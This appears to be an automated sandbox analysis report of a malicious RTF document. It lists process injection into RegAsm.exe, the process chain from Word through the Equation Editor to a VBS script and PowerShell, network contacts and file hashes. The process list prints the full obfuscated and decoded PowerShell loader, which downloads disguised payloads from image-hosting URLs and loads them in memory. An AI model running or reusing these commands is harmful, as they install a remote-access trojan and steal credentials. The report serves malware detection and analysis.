PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2844 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2988 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 1868 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b5b2948d407676eab86b1152e7ce5ec4.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imgeloversaround.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreEYDgTreVDgTreBSDgTreEsDgTreLwBoDgTreGcDgTreZgDgTrevDgTreHDgTreDgTrecDgTreBtDgTreGEDgTreeDgTreDgTrevDgTreDYDgTreNQDgTreuDgTreDcDgTreODgTreDgTreuDgTreDcDgTreMwDgTreyDgTreC4DgTreMwDgTrewDgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEsDgTreUgBUDgTreEYDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FTRK/hgf/ppmax/65.78.732.301//:ptth' , '1' , 'C:\ProgramData\' , 'KRTF','RegAsm',''))} }"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KRTF.vbs

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\veskna"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fyydokank"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ialwoclggydvi"

Network

Country Destination Domain Proto
VN 103.237.87.56:80 103.237.87.56 tcp
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 104.21.45.138:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 95.101.143.18:80 apps.identrust.com tcp
VN 103.237.87.56:80 103.237.87.56 tcp
US 107.172.31.178:2404 tcp
US 107.172.31.178:2404 tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

memory/2296-0-0x000000002FFF1000-0x000000002FFF2000-memory.dmp

memory/2296-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2296-2-0x0000000070AED000-0x0000000070AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\imgeloversaround.vbs

MD5 2a520c8caa07eaed10422ff67f239626
SHA1 18cfb75b5f659e695336cec6c3cdf0bacc427e5d
SHA256 46f873513f403b202a8a3e6b565c60bc536b3ea80e77def007f1ccb19c52c4ad
SHA512 ba137a4e43c67adebf69b81fadcd0751268c45f21cb1f452f1d057c2f11c58c07987da2ea721f34e1fdd88e815125eab7af34973c3af719dbe38dae07bd57b81

memory/564-35-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/564-36-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/564-37-0x0000000002760000-0x00000000027A0000-memory.dmp

memory/564-38-0x0000000002760000-0x00000000027A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 83156977fb85ed1ee96c8c05ea75e27d
SHA1 b6aa1733282f7b7620a007333af1f1f6b07f5bb0
SHA256 746a3fb408931b52d0f229981d35ccfa6794f164ab7ba7915501263c47643a10
SHA512 8061049684fe027346cb0e54771a6a74998cb712431897491023664ea98e9a2a862b387786d07781f75994e0c6dd945a34a122e8c76cb7459cc6ad668ba47800

memory/2752-44-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/2752-45-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2752-46-0x000000006A210000-0x000000006A7BB000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7760a3c5ab0a031317800966df1ca5f4
SHA1 7dd15917617ac98f1484af9ec49bde82d0ebef85
SHA256 e039b024275fc4400dabc8658549dd28f8c131d4aa4e94349c78e76235f16417
SHA512 50bfaf759759e356586faf5c0763e14551a52ee76b951a6b71bbb56bb422c997abb41c51b2743639c6bc2feb1a7594d6f779b8869d219b535ae89c92796d4526

C:\Users\Admin\AppData\Local\Temp\Cab9B17.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar9B49.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

memory/2296-86-0x0000000070AED000-0x0000000070AF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar9D23.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/564-138-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/564-139-0x0000000002760000-0x00000000027A0000-memory.dmp

memory/1044-145-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/1044-146-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/1044-148-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/1044-147-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/1044-151-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/1868-152-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1868-155-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2752-153-0x000000006A210000-0x000000006A7BB000-memory.dmp

memory/1868-157-0x0000000000400000-0x0000000000482000-memory.dmp

